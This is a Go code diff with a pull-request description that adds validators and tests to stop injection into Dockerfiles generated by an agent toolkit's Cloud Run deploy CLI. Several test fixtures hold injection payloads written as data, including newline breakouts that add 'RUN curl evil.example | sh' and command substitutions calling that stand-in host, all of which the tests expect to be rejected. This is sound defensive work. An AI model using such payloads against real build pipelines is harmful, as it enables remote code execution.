 				}
 				f.build.execFile = exec
-				f.build.execPath = path.Join(f.build.tempDir, exec)
+			}
+
+			// execFile becomes both COPY operands, and COPY splits its operands
+			// on whitespace, so a bare filename is not enough: it takes the
+			// allowlist even though this Dockerfile has no RUN instruction.
+			if err := util.ValidateShellArgSafe(f.build.execFile,
+				fmt.Sprintf("executable name derived from --entry_point_path %q:", origEntryPointPath)); err != nil {
+				return err
+			}
+
+			if f.build.tempDir == "" {
+				f.build.tempDir = os.TempDir()
+			}
+			absp, err = filepath.Abs(f.build.tempDir)
+			if err != nil {
+				return fmt.Errorf("cannot make an absolute path from '%v': %w", f.build.tempDir, err)
+			}
+			f.build.tempDir, err = os.MkdirTemp(absp, "cloudrun_"+time.Now().Format("20060102_150405__")+"*")
+			if err != nil {
+				return fmt.Errorf("cannot create a temporary sub directory in '%v': %w", absp, err)
+			}
+			p("Using temp dir:", f.build.tempDir)
+
+			if f.build.execPath == "" {
+				f.build.execPath = path.Join(f.build.tempDir, f.build.execFile)
 			}
 			f.build.dockerfileBuildPath = path.Join(f.build.tempDir, "Dockerfile")
 
@@ -199,37 +229,41 @@ func (f *deployCloudRunFlags) prepareDockerfile() error {
 		func(p util.Printer) error {
 			p("Writing:", f.build.dockerfileBuildPath)
 
+			// Every value below is read off the receiver, not off the package
+			// global. computeFlags validates the receiver, so a read of the
+			// global here would let the guard and the line it guards come apart
+			// for any caller that is not the cobra RunE.
 			var b strings.Builder
 			b.WriteString(`
 FROM gcr.io/distroless/static-debian11
 
 COPY ` + f.build.execFile + `  /app/` + f.build.execFile + `
-EXPOSE ` + strconv.Itoa(flags.cloudRun.serverPort) + `
+EXPOSE ` + strconv.Itoa(f.cloudRun.serverPort) + `
 # Command to run the executable when the container starts
-CMD ["/app/` + f.build.execFile + `", "web", "-port", "` + strconv.Itoa(flags.cloudRun.serverPort) + `"`)
+CMD ["/app/` + f.build.execFile + `", "web", "-port", "` + strconv.Itoa(f.cloudRun.serverPort) + `"`)
 
-			if flags.cloudRun.api {
+			if f.cloudRun.api {
 				b.WriteString(`, "api", "-webui_address", "127.0.0.1:` + strconv.Itoa(f.proxy.port) + `"`)
 			}
-			if flags.cloudRun.a2a {
-				b.WriteString(`, "a2a", "--a2a_agent_url", "` + flags.cloudRun.a2aAgentCardURL + `"`)
+			if f.cloudRun.a2a {
+				b.WriteString(`, "a2a", "--a2a_agent_url", "` + f.cloudRun.a2aAgentCardURL + `"`)
 			}
-			if flags.cloudRun.webui {
+			if f.cloudRun.webui {
 				b.WriteString(`, "webui", "--api_server_address", "http://127.0.0.1:` + strconv.Itoa(f.proxy.port) + `/api"`)
 			}
-			if flags.cloudRun.pubsub {
+			if f.cloudRun.pubsub {
 				b.WriteString(`, "pubsub"`)
-				fmt.Fprintf(&b, `, "--trigger_max_retries", "%d"`, flags.cloudRun.pubsubTrigger.maxRetries)
-				fmt.Fprintf(&b, `, "--trigger_base_delay", "%s"`, flags.cloudRun.pubsubTrigger.baseDelay.String())
-				fmt.Fprintf(&b, `, "--trigger_max_delay", "%s"`, flags.cloudRun.pubsubTrigger.maxDelay.String())
-				fmt.Fprintf(&b, `, "--trigger_max_concurrent_runs", "%d"`, flags.cloudRun.pubsubTrigger.maxRuns)
+				fmt.Fprintf(&b, `, "--trigger_max_retries", "%d"`, f.cloudRun.pubsubTrigger.maxRetries)
+				fmt.Fprintf(&b, `, "--trigger_base_delay", "%s"`, f.cloudRun.pubsubTrigger.baseDelay.String())
+				fmt.Fprintf(&b, `, "--trigger_max_delay", "%s"`, f.cloudRun.pubsubTrigger.maxDelay.String())
+				fmt.Fprintf(&b, `, "--trigger_max_concurrent_runs", "%d"`, f.cloudRun.pubsubTrigger.maxRuns)
 			}
-			if flags.cloudRun.eventarc {
+			if f.cloudRun.eventarc {
 				b.WriteString(`, "eventarc"`)
-				fmt.Fprintf(&b, `, "--trigger_max_retries", "%d"`, flags.cloudRun.eventarcTrigger.maxRetries)
-				fmt.Fprintf(&b, `, "--trigger_base_delay", "%s"`, flags.cloudRun.eventarcTrigger.baseDelay.String())
-				fmt.Fprintf(&b, `, "--trigger_max_delay", "%s"`, flags.cloudRun.eventarcTrigger.maxDelay.String())
-				fmt.Fprintf(&b, `, "--trigger_max_concurrent_runs", "%d"`, flags.cloudRun.eventarcTrigger.maxRuns)
+				fmt.Fprintf(&b, `, "--trigger_max_retries", "%d"`, f.cloudRun.eventarcTrigger.maxRetries)
+				fmt.Fprintf(&b, `, "--trigger_base_delay", "%s"`, f.cloudRun.eventarcTrigger.baseDelay.String())
+				fmt.Fprintf(&b, `, "--trigger_max_delay", "%s"`, f.cloudRun.eventarcTrigger.maxDelay.String())
+				fmt.Fprintf(&b, `, "--trigger_max_concurrent_runs", "%d"`, f.cloudRun.eventarcTrigger.maxRuns)
 			}
 			b.WriteString(`]`)
 			return os.WriteFile(f.build.dockerfileBuildPath, []byte(b.String()), 0o600)

--- a/cmd/adkgo/internal/deploy/cloudrun/cloudrun_test.go
+++ b/cmd/adkgo/internal/deploy/cloudrun/cloudrun_test.go
@@ -1,0 +1,302 @@
+// Copyright 2026 Google LLC
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//     http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+
+package cloudrun
+
+import (
+	"encoding/json"
+	"fmt"
+	"os"
+	"path/filepath"
+	"slices"
+	"strings"
+	"testing"
+	"time"
+)
+
+// resetFlags points the package-level flags var at a fresh, minimally valid
+// state for the duration of one test, restoring the previous value afterwards.
+// computeFlags reads and writes that global directly, so without the restore
+// one test's leftovers (an absolutised entryPointPath, a consumed tempDir)
+// would be the next test's starting state.
+//
+// The state installed here is the zero value plus the three fields computeFlags
+// needs, so a test that depends on a flag default (serverPort, which cobra
+// registers as 8080) sets it itself rather than inheriting it.
+func resetFlags(t *testing.T, entryPointPath, a2aAgentCardURL string) {
+	t.Helper()
+	saved := flags
+	t.Cleanup(func() { flags = saved })
+
+	flags = deployCloudRunFlags{}
+	flags.source.entryPointPath = entryPointPath
+	flags.build.tempDir = t.TempDir()
+	flags.cloudRun.a2aAgentCardURL = a2aAgentCardURL
+}
+
+// allowListRejection is the part of the ValidateShellArgSafe rejection message
+// that no other validator produces. The test below matches on it rather than on
+// a label, because "entry point" is also a substring of the pre-existing
+// StripExtension wrapper ("cannot strip '.go' extension from entry point path
+// '%v'"): a payload edited to drop the .go extension would then satisfy a
+// label-only assertion while saying nothing about the allow-list. It names the
+// two reasons rather than the rejection itself, because the shorter sentence
+// ("not allowed in a value embedded in generated Dockerfile content") is in
+// ValidateDockerfileSafe's message too, and matching that would let execFile be
+// downgraded to the weaker check unnoticed.
+const allowListRejection = "whitespace splits COPY operands and shell metacharacters are live in a RUN line"
+
+func TestComputeFlags_RejectsUnsafeEntryPointBasename(t *testing.T) {
+	// The basename (with .go stripped) becomes f.build.execFile, which is
+	// embedded directly into the generated Dockerfile's COPY/CMD lines. The
+	// benign directory component is what makes the %q assertion below able to
+	// tell the raw flag value from the derived basename it guards: without it
+	// the two strings are byte-identical.
+	maliciousEntryPoint := "cmd/quickstart/main\"\nRUN curl evil.example | sh\n#.go"
+	resetFlags(t, maliciousEntryPoint, "http://127.0.0.1:8081")
+
+	err := flags.computeFlags()
+	if err == nil {
+		t.Fatal("computeFlags() = nil, want an error rejecting the unsafe entry point basename")
+	}
+	if !strings.Contains(err.Error(), allowListRejection) {
+		t.Errorf("computeFlags() error = %v, want the allow-list rejection %q", err, allowListRejection)
+	}
+	// The checked value is derived from the flag rather than typed, so the
+	// message has to carry the flag and the value as typed for the user to
+	// locate it. Asserted as one string so the label cannot stay while the
+	// check moves onto some other processed form of the path.
+	if want := fmt.Sprintf("derived from --entry_point_path %q", maliciousEntryPoint); !strings.Contains(err.Error(), want) {
+		t.Errorf("computeFlags() error = %v, want it to contain %s", err, want)
+	}
+}
+
+func TestComputeFlags_RejectsUnsafeA2AAgentCardURL(t *testing.T) {
+	maliciousURL := `http://127.0.0.1:8081"]` + "\nRUN curl evil.example | sh\n#"
+	resetFlags(t, "main.go", maliciousURL)
+
+	err := flags.computeFlags()
+	if err == nil {
+		t.Fatal("computeFlags() = nil, want an error rejecting the unsafe --a2a_agent_url value")
+	}
+	if !strings.Contains(err.Error(), "a2a_agent_url") {
+		t.Errorf("computeFlags() error = %v, want it to mention --a2a_agent_url", err)
+	}
+}
+
+func TestComputeFlags_AcceptsBenignValues(t *testing.T) {
+	resetFlags(t, "main.go", "http://127.0.0.1:8081")
+
+	if err := flags.computeFlags(); err != nil {
+		t.Fatalf("computeFlags() = %v, want no error for benign values", err)
+	}
+	if flags.build.execFile != "main" {
+		t.Errorf("execFile = %q, want %q", flags.build.execFile, "main")
+	}
+	// Deriving execFile above os.MkdirTemp and assigning execPath below it is
+	// what keeps a rejected invocation from leaving a temp dir behind, but it
+	// also means the two are no longer set together, and only the ordering puts
+	// execPath inside the directory that was created. compileEntryPoint writes
+	// the binary at execPath and the Dockerfile COPYs it out of the build
+	// context, so an execPath that resolved against the raw --temp_dir instead
+	// would fail every deploy on a missing COPY source.
+	if !strings.HasPrefix(flags.build.execPath, flags.build.tempDir+"/") {
+		t.Errorf("execPath = %q, want it inside the created temp dir %q", flags.build.execPath, flags.build.tempDir)
+	}
+}
+
+// TestComputeFlags_AcceptsNonASCIIEntryPoint guards the deliberate decision to
+// let the shell-arg allowlist admit non-ASCII runes: every byte of a multi-byte
+// UTF-8 rune is >= 0x80, so none of them can be a shell metacharacter or a
+// Dockerfile token separator, and rejecting them would fail deploys that work
+// today.
+func TestComputeFlags_AcceptsNonASCIIEntryPoint(t *testing.T) {
+	resetFlags(t, "agentes/café/agenté.go", "http://127.0.0.1:8081")
+
+	if err := flags.computeFlags(); err != nil {
+		t.Fatalf("computeFlags() = %v, want no error for a non-ASCII entry point path", err)
+	}
+	if flags.build.execFile != "agenté" {
+		t.Errorf("execFile = %q, want %q", flags.build.execFile, "agenté")
+	}
+}
+
+// TestComputeFlags_RejectsWhitespaceInExecFile guards the reason execFile keeps
+// the allowlist here even though this Dockerfile has no RUN instruction. COPY
+// splits its operands on whitespace, so an execFile containing a space emits
+// "COPY my agent  /app/my agent" and fails the build. A space is exactly what
+// ValidateDockerfileSafe permits, so relaxing execFile to it would reintroduce
+// that. The tab case does not carry the argument, since both checks reject a
+// control byte; it is here to cover the other whitespace character.
+func TestComputeFlags_RejectsWhitespaceInExecFile(t *testing.T) {
+	for _, entryPoint := range []string{"my agent.go", "my\tagent.go"} {
+		resetFlags(t, entryPoint, "http://127.0.0.1:8081")
+
+		if err := flags.computeFlags(); err == nil {
+			t.Errorf("computeFlags() with entry point %q = nil, want an error: the COPY operands would not survive whitespace", entryPoint)
+		}
+	}
+}
+
+// TestComputeFlags_RejectionLeavesNoTempDir pins the ordering of every check
+// that can fail against os.MkdirTemp. cleanTemp only runs after a fully
+// successful deploy, there is no defer, so a check that fires after the temp
+// dir is created leaves an empty cloudrun_<timestamp>_* directory behind on
+// every rejected invocation. Nothing above os.MkdirTemp needs the directory;
+// the fields that resolve against it (execPath, dockerfileBuildPath) are
+// assigned below it.
+//
+// The third case is the one main leaks on today: StripExtension moved above
+// os.MkdirTemp with the two validators, and an entry point path with no ".go"
+// suffix is the only way to reach it.
+func TestComputeFlags_RejectionLeavesNoTempDir(t *testing.T) {
+	for name, payload := range map[string]struct{ entryPoint, agentURL string }{
+		"unsafe entry point": {"main\"\nRUN curl evil.example | sh\n#.go", "http://127.0.0.1:8081"},
+		"unsafe a2a url":     {"main.go", "http://127.0.0.1:8081\"]\nRUN curl evil.example | sh\n#"},
+		"no .go extension":   {"main", "http://127.0.0.1:8081"},
+	} {
+		t.Run(name, func(t *testing.T) {
+			resetFlags(t, payload.entryPoint, payload.agentURL)
+			parent := flags.build.tempDir
+
+			if err := flags.computeFlags(); err == nil {
+				t.Fatal("computeFlags() = nil, want an error")
+			}
+			entries, err := os.ReadDir(parent)
+			if err != nil {
+				t.Fatalf("cannot read the temp dir parent: %v", err)
+			}
+			for _, e := range entries {
+				t.Errorf("rejected invocation left %q behind in the temp dir parent", e.Name())
+			}
+		})
+	}
+}
+
+// TestPrepareDockerfile_ReadsReceiverNotGlobal is the only test in this package
+// that drives prepareDockerfile from a receiver that is not the package global.
+// Everywhere else the two are the same struct, so a value read off the global
+// still emits the right bytes and the drift the receiver conversion removed
+// would come back silently. Here the global holds different values, so a single
+// flags.cloudRun read turns this red, for every value and every branch
+// condition prepareDockerfile has, not just the ones the allowlist guards.
+func TestPrepareDockerfile_ReadsReceiverNotGlobal(t *testing.T) {
+	const (
+		receiverPort = 9091
+		receiverURL  = "http://127.0.0.1:9099"
+		proxyPort    = 9098
+	)
+	// The global: a different port, a different --a2a_agent_url, a different
+	// executable name, a different proxy port, and every optional block left
+	// off. The last one is what pins the branch conditions as well as the
+	// values: a prepareDockerfile that tested flags.cloudRun.a2a would skip the
+	// block that carries the URL entirely.
+	resetFlags(t, "main.go", "http://127.0.0.1:8081")
+	flags.cloudRun.serverPort = 8080
+	flags.build.execFile = "other"
+	flags.proxy.port = 8000
+
+	// Every optional block on, each with a value the global does not hold.
+	f := &deployCloudRunFlags{}
+	f.build.execFile = "main"
+	f.build.dockerfileBuildPath = filepath.Join(t.TempDir(), "Dockerfile")
+	f.cloudRun.serverPort = receiverPort
+	f.proxy.port = proxyPort
+	f.cloudRun.a2a = true
+	f.cloudRun.a2aAgentCardURL = receiverURL
+	f.cloudRun.api = true
+	f.cloudRun.webui = true
+	f.cloudRun.pubsub = true
+	f.cloudRun.pubsubTrigger = triggerConfigFlags{maxRetries: 11, baseDelay: 2 * time.Second, maxDelay: 33 * time.Second, maxRuns: 44}
+	f.cloudRun.eventarc = true
+	f.cloudRun.eventarcTrigger = triggerConfigFlags{maxRetries: 55, baseDelay: 6 * time.Second, maxDelay: 47 * time.Second, maxRuns: 88}
+
+	if err := f.prepareDockerfile(); err != nil {
+		t.Fatalf("prepareDockerfile() = %v, want no error", err)
+	}
+	content, err := os.ReadFile(f.build.dockerfileBuildPath)
+	if err != nil {
+		t.Fatalf("cannot read the generated Dockerfile: %v", err)
+	}
+	if !strings.Contains(string(content), "\nEXPOSE 9091\n") {
+		t.Errorf("Dockerfile does not EXPOSE the receiver's server port:\n%s", content)
+	}
+	if !strings.Contains(string(content), receiverURL) {
+		t.Errorf("Dockerfile does not carry the receiver's --a2a_agent_url:\n%s", content)
+	}
+	// execFile is the value the strict allow-list exists for in this package:
+	// it is both COPY operands and the CMD argv[0]. Nothing else in the file
+	// distinguishes a receiver read from a global one for it.
+	if !strings.Contains(string(content), "\nCOPY main  /app/main\n") {
+		t.Errorf("Dockerfile does not COPY the receiver's execFile:\n%s", content)
+	}
+	if !strings.Contains(string(content), `["/app/main", "web"`) {
+		t.Errorf("Dockerfile CMD does not run the receiver's execFile:\n%s", content)
+	}
+	// The rest of the CMD array, one assertion per optional block, asserted as
+	// the whole emitted segment so each covers its branch condition and every
+	// value inside it. Nothing can be injected through these, since they are
+	// ints, durations and bools, but they are the remainder of the same property,
+	// and no other test in this package sets the flags that emit them.
+	for name, want := range map[string]string{
+		"api":      `, "api", "-webui_address", "127.0.0.1:9098"`,
+		"webui":    `, "webui", "--api_server_address", "http://127.0.0.1:9098/api"`,
+		"pubsub":   `, "pubsub", "--trigger_max_retries", "11", "--trigger_base_delay", "2s", "--trigger_max_delay", "33s", "--trigger_max_concurrent_runs", "44"`,
+		"eventarc": `, "eventarc", "--trigger_max_retries", "55", "--trigger_base_delay", "6s", "--trigger_max_delay", "47s", "--trigger_max_concurrent_runs", "88"`,
+	} {
+		if !strings.Contains(string(content), want) {
+			t.Errorf("Dockerfile CMD does not carry the receiver's %s block %s:\n%s", name, want, content)
+		}
+	}
+}
+
+// TestPrepareDockerfile_A2AURLReachesCMDArray runs the branch that interpolates
+// --a2a_agent_url, which only fires when --a2a is set, and checks the emitted
+// CMD is still a parseable JSON array carrying the value. Without this the
+// validator and the line it protects are only connected by reading the code.
+func TestPrepareDockerfile_A2AURLReachesCMDArray(t *testing.T) {
+	const agentURL = "http://127.0.0.1:8081"
+	resetFlags(t, "main.go", agentURL)
+	flags.cloudRun.a2a = true
+	flags.cloudRun.serverPort = 8080
+
+	if err := flags.computeFlags(); err != nil {
+		t.Fatalf("computeFlags() = %v, want no error", err)
+	}
+	if err := flags.prepareDockerfile(); err != nil {
+		t.Fatalf("prepareDockerfile() = %v, want no error", err)
+	}
+
+	content, err := os.ReadFile(flags.build.dockerfileBuildPath)
+	if err != nil {
+		t.Fatalf("cannot read the generated Dockerfile: %v", err)
+	}
+	var cmdLine string
+	for _, line := range strings.Split(string(content), "\n") {
+		if rest, ok := strings.CutPrefix(line, "CMD "); ok {
+			cmdLine = rest
+		}
+	}
+	if cmdLine == "" {
+		t.Fatalf("no CMD instruction in the generated Dockerfile:\n%s", content)
+	}
+
+	var args []string
+	if err := json.Unmarshal([]byte(cmdLine), &args); err != nil {
+		t.Fatalf("CMD %s does not parse as a JSON array: %v", cmdLine, err)
+	}
+	if !slices.Contains(args, agentURL) {
+		t.Errorf("CMD args = %q, want them to carry %q", args, agentURL)
+	}
+}

--- a/internal/cli/util/text_helpers.go
+++ b/internal/cli/util/text_helpers.go
@@ -14,11 +14,86 @@
 
 package util
 
-import "strings"
+import (
+	"fmt"
+	"strings"
+	"unicode/utf8"
+)
 
 func CenterString(s string, w int) string {
 	sw := w - len(s)
 	lw := sw / 2
 	rw := sw - lw
 	return strings.Repeat(" ", lw) + s + strings.Repeat(" ", rw)
+}
+
+// ValidateDockerfileSafe reports an error if s contains a byte that, embedded
+// literally into generated Dockerfile content, could break out of the
+// double-quoted string it sits in or out of the current instruction entirely.
+// Dockerfile instructions are newline-delimited and offer no generic escaping
+// mechanism for interpolated values, so the check rejects rather than quotes.
+//
+// The rejected set is '"', '`', '\', every C0 control byte (which covers NUL,
+// LF and CR), and any string that is not valid UTF-8. Backslash and the
+// remaining control bytes are part of it because an exec-form CMD must be a
+// valid JSON array, and Docker's response to an unparseable exec form is not to
+// fail the build but to silently reinterpret the whole instruction as shell
+// form. A value that does parse can still be wrong: JSON decodes, say, "\n" into
+// a real newline, and an invalid UTF-8 byte is replaced with U+FFFD by both the
+// Dockerfile parser and Go's JSON decoder, so the container would receive
+// something other than what was written. Accepting a value therefore guarantees
+// the emitted CMD line still parses as JSON, and that the value survives into
+// the container unchanged.
+//
+// This is the weaker of the two checks. A value that reaches a RUN instruction
+// needs ValidateShellArgSafe instead.
+func ValidateDockerfileSafe(s, label string) error {
+	// Deliberately a byte loop rather than a rune loop: the property being
+	// enforced is about the bytes written to the file.
+	for i := 0; i < len(s); i++ {
+		if c := s[i]; c == '"' || c == '`' || c == '\\' || c < 0x20 {
+			return fmt.Errorf("%s %q contains a character (quote, backtick, backslash, or a control character) that is not allowed in a value embedded in generated Dockerfile content", label, s)
+		}
+	}
+	if !utf8.ValidString(s) {
+		return fmt.Errorf("%s %q is not valid UTF-8; the invalid bytes would reach the container as U+FFFD rather than as written", label, s)
+	}
+	return nil
+}
+
+// ValidateShellArgSafe reports an error if s contains anything other than a
+// plain path/filename character: letters, digits, '.', '/', '-', '_', or a
+// non-ASCII rune. It is the check for a value that reaches a Dockerfile RUN
+// instruction, which runs in shell form (`/bin/sh -c "..."`), so shell
+// metacharacters such as ';', '|', '&', or '$()' are dangerous there even
+// without any quote or newline breakout. It is also the check for a value that
+// lands in a COPY operand, since COPY splits its operands on whitespace, which
+// ValidateDockerfileSafe permits.
+//
+// Non-ASCII characters are admitted because excluding them buys no safety and
+// does break working deploys. Every byte of a multi-byte UTF-8 rune is >= 0x80
+// while every shell metacharacter, and every byte the Dockerfile parser treats
+// as a token separator, is ASCII. Meanwhile the values checked here include a
+// whole --entry_point_path, whose directory components routinely carry
+// characters no Go filename would. ASCII punctuation outside the class stays
+// rejected even where it is inert today, so the allowlist does not depend on
+// where a future caller interpolates the value.
+func ValidateShellArgSafe(s, label string) error {
+	// A byte loop, for the same reason as in ValidateDockerfileSafe. Every byte
+	// of a multi-byte rune is >= 0x80, so the class can be applied per byte and
+	// the UTF-8 check below rules out a stray high byte that is not part of one.
+	for i := 0; i < len(s); i++ {
+		c := s[i]
+		switch {
+		case c >= 'A' && c <= 'Z', c >= 'a' && c <= 'z', c >= '0' && c <= '9':
+		case c == '_', c == '.', c == '/', c == '-':
+		case c >= 0x80:
+		default:
+			return fmt.Errorf("%s %q contains a character not allowed in a value embedded in generated Dockerfile content; whitespace splits COPY operands and shell metacharacters are live in a RUN line, so only letters, digits, '.', '/', '-', '_', and non-ASCII characters are permitted", label, s)
+		}
+	}
+	if !utf8.ValidString(s) {
+		return fmt.Errorf("%s %q is not valid UTF-8; a COPY operand containing an invalid byte does not match the file it names", label, s)
+	}
+	return nil
 }

--- a/internal/cli/util/text_helpers_test.go
+++ b/internal/cli/util/text_helpers_test.go
@@ -1,0 +1,202 @@
+// Copyright 2026 Google LLC
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//     http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+
+package util
+
+import (
+	"encoding/json"
+	"strings"
+	"testing"
+	"unicode/utf8"
+)
+
+func TestValidateDockerfileSafe(t *testing.T) {
+	tests := []struct {
+		name    string
+		value   string
+		wantErr bool
+	}{
+		{name: "plain identifier", value: "myserver", wantErr: false},
+		{name: "path with slashes and dots", value: "cmd/quickstart/main.go", wantErr: false},
+		{name: "url", value: "http://127.0.0.1:8081", wantErr: false},
+		{name: "empty string", value: "", wantErr: false},
+		{name: "newline breaks out of the current instruction", value: "x\nRUN curl evil.example | sh\n#", wantErr: true},
+		{name: "carriage return", value: "x\rRUN curl evil.example | sh", wantErr: true},
+		{name: "double quote breaks out of a CMD JSON-array string", value: `x", "extra"]`, wantErr: true},
+		{name: "backtick", value: "x`whoami`", wantErr: true},
+		{name: "NUL byte", value: "x\x00y", wantErr: true},
+		// A backslash keeps the CMD array parseable but silently changes the
+		// decoded argument, so "http://x\ny" would reach the container with a
+		// real newline in it.
+		{name: "backslash escape decodes to a different value", value: `http://x\ny`, wantErr: true},
+		// A lone backslash instead makes the array unparseable, and Docker
+		// answers an unparseable exec form by rerunning it as shell form.
+		{name: "trailing backslash breaks CMD JSON", value: `http://x\`, wantErr: true},
+		{name: "tab is a control byte", value: "x\ty", wantErr: true},
+		{name: "escape byte", value: "x\x1by", wantErr: true},
+		// Non-ASCII is fine here: it cannot terminate a JSON string.
+		{name: "non-ASCII", value: "http://café.example", wantErr: false},
+		// Invalid UTF-8 keeps the array parseable, but the Dockerfile parser
+		// and the JSON decoder both turn the byte into U+FFFD, so the container
+		// receives a value nobody wrote.
+		{name: "invalid UTF-8 does not survive to the container", value: "http://x\xffy", wantErr: true},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			err := ValidateDockerfileSafe(tt.value, "test value")
+			if (err != nil) != tt.wantErr {
+				t.Errorf("ValidateDockerfileSafe(%q) error = %v, wantErr %v", tt.value, err, tt.wantErr)
+			}
+		})
+	}
+}
+
+func TestValidateShellArgSafe(t *testing.T) {
+	tests := []struct {
+		name    string
+		value   string
+		wantErr bool
+	}{
+		{name: "plain identifier", value: "myserver", wantErr: false},
+		{name: "path with slashes and dots", value: "cmd/quickstart/main.go", wantErr: false},
+		{name: "empty string", value: "", wantErr: false},
+		{name: "semicolon command separator", value: "main.go; curl evil.example | sh #", wantErr: true},
+		{name: "pipe to shell", value: "main.go | sh", wantErr: true},
+		{name: "ampersand background/chain", value: "main.go && curl evil.example", wantErr: true},
+		{name: "command substitution", value: "$(curl evil.example)", wantErr: true},
+		{name: "backtick command substitution", value: "`curl evil.example`", wantErr: true},
+		{name: "space", value: "main go", wantErr: true},
+		{name: "newline", value: "x\nRUN curl evil.example | sh\n#", wantErr: true},
+		{name: "double quote", value: `x"`, wantErr: true},
+		{name: "backslash", value: `x\y`, wantErr: true},
+		{name: "url is rejected (not a path)", value: "http://127.0.0.1:8081", wantErr: true},
+		// Non-ASCII is admitted: every byte of a multi-byte UTF-8 rune is
+		// >= 0x80, so none of them can be a shell metacharacter. Rejecting
+		// these failed deploys that work today, which is the whole reason the
+		// class is wider than a bare [A-Za-z0-9_./-].
+		{name: "non-ASCII filename", value: "agenté", wantErr: false},
+		{name: "non-ASCII directory component", value: "agentes/café/main.go", wantErr: false},
+		{name: "non-Latin script", value: "агент", wantErr: false},
+		// Every other non-ASCII case here is in the Basic Multilingual Plane.
+		// A supplementary-plane rune is four bytes rather than two or three,
+		// and is the case a UTF-16-shaped implementation would get wrong, so
+		// the class boundary is stated here rather than left implicit in the
+		// utf8.MaxRune bound of the property test below.
+		{name: "supplementary-plane rune", value: "agent😀", wantErr: false},
+		// Not covered by the reason above: a raw 0xff is not a metacharacter,
+		// but it never deployed either. The build warns about the encoding and
+		// COPY then fails to find a file whose name came through as U+FFFD.
+		{name: "invalid UTF-8", value: "agent\xff", wantErr: true},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			err := ValidateShellArgSafe(tt.value, "test value")
+			if (err != nil) != tt.wantErr {
+				t.Errorf("ValidateShellArgSafe(%q) error = %v, wantErr %v", tt.value, err, tt.wantErr)
+			}
+		})
+	}
+}
+
+// cmdArgs parses the exec-form CMD line cloudrun.go emits, with value
+// interpolated as the --a2a_agent_url argument.
+func cmdArgs(value string) ([]string, error) {
+	var args []string
+	err := json.Unmarshal([]byte(`["/app/main", "web", "--a2a_agent_url", "`+value+`"]`), &args)
+	return args, err
+}
+
+// TestValidateDockerfileSafe_AcceptedValuesKeepCMDParseable pins the property
+// the doc comment claims, which a table of hand-picked payloads cannot: every
+// value the check accepts must leave the generated exec-form CMD parseable as a
+// JSON array, and must survive the parse unchanged. Docker answers an
+// unparseable exec form by silently rerunning the instruction as shell form, so
+// a gap here is not a build failure but a change of execution mode.
+func TestValidateDockerfileSafe_AcceptedValuesKeepCMDParseable(t *testing.T) {
+	// Every single byte, so that no control byte, escape character or invalid
+	// UTF-8 byte slips through unnoticed.
+	for b := 0; b < 0x100; b++ {
+		value := "http://x" + string([]byte{byte(b)}) + "y"
+		if ValidateDockerfileSafe(value, "test value") != nil {
+			continue
+		}
+		args, err := cmdArgs(value)
+		if err != nil {
+			t.Errorf("byte 0x%02x is accepted but makes the CMD line unparseable: %v", b, err)
+			continue
+		}
+		if got := args[len(args)-1]; got != value {
+			t.Errorf("byte 0x%02x is accepted but decodes to %q, want %q", b, got, value)
+		}
+	}
+
+	// Every valid rune, as the valid UTF-8 that a flag value actually carries,
+	// so that an accepted value also reaches the container as it was written.
+	// Up to utf8.MaxRune rather than the BMP, so a supplementary-plane
+	// character in a path (an emoji, CJK Ext-B) is covered by the claim above.
+	for r := rune(0); r <= utf8.MaxRune; r++ {
+		if !utf8.ValidRune(r) {
+			continue
+		}
+		value := "http://x" + string(r) + "y"
+		if ValidateDockerfileSafe(value, "test value") != nil {
+			continue
+		}
+		args, err := cmdArgs(value)
+		if err != nil {
+			t.Errorf("rune %U is accepted but makes the CMD line unparseable: %v", r, err)
+			continue
+		}
+		if got := args[len(args)-1]; got != value {
+			t.Errorf("rune %U is accepted but decodes to %q, want %q", r, got, value)
+		}
+	}
+}
+
+// TestValidateShellArgSafe_ByteClass pins the allow-list: nothing outside the
+// intended ASCII class may be accepted, and no valid non-ASCII rune may be
+// rejected, since every byte of one is >= 0x80 and can never be a shell
+// metacharacter or a Dockerfile token separator. A byte >= 0x80 outside a valid
+// rune is a different case and is rejected.
+func TestValidateShellArgSafe_ByteClass(t *testing.T) {
+	const allowedASCII = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_./-"
+
+	for b := 0; b < 0x80; b++ {
+		accepted := ValidateShellArgSafe(string([]byte{byte(b)}), "test value") == nil
+		want := strings.ContainsRune(allowedASCII, rune(b))
+		if accepted != want {
+			t.Errorf("byte 0x%02x accepted = %v, want %v", b, accepted, want)
+		}
+	}
+
+	// Up to utf8.MaxRune, not just the BMP: a supplementary-plane character in
+	// a directory name is as much a "valid non-ASCII rune" as a BMP one, and
+	// the claim above covers it.
+	for r := rune(0x80); r <= utf8.MaxRune; r++ {
+		if !utf8.ValidRune(r) {
+			continue
+		}
+		if err := ValidateShellArgSafe("agent"+string(r), "test value"); err != nil {
+			t.Errorf("rune %U rejected: %v", r, err)
+		}
+	}
+
+	for b := 0x80; b < 0x100; b++ {
+		if err := ValidateShellArgSafe("agent"+string([]byte{byte(b)}), "test value"); err == nil {
+			t.Errorf("lone byte 0x%02x accepted, want rejected: it is not part of a valid rune", b)
+		}
+	}
+}


### PR DESCRIPTION
## Problem

Two injection paths shipped in 2.4.0 and are still open on 1.x.

- A fetched agent card's interface URLs are trusted as given, so a card can point its transports at an origin other than the one it was fetched from.
- Deploy CLI values are interpolated into generated Dockerfile content without validation. `--a2a_agent_url` lands in a `CMD` argument, and the executable name derived from `--entry_point_path` becomes both `COPY` operands, which `COPY` splits on whitespace.

## Summary

Backports #1418 and #1240.

- **#1418** pins every interface URL on a fetched card to the origin it was fetched from.
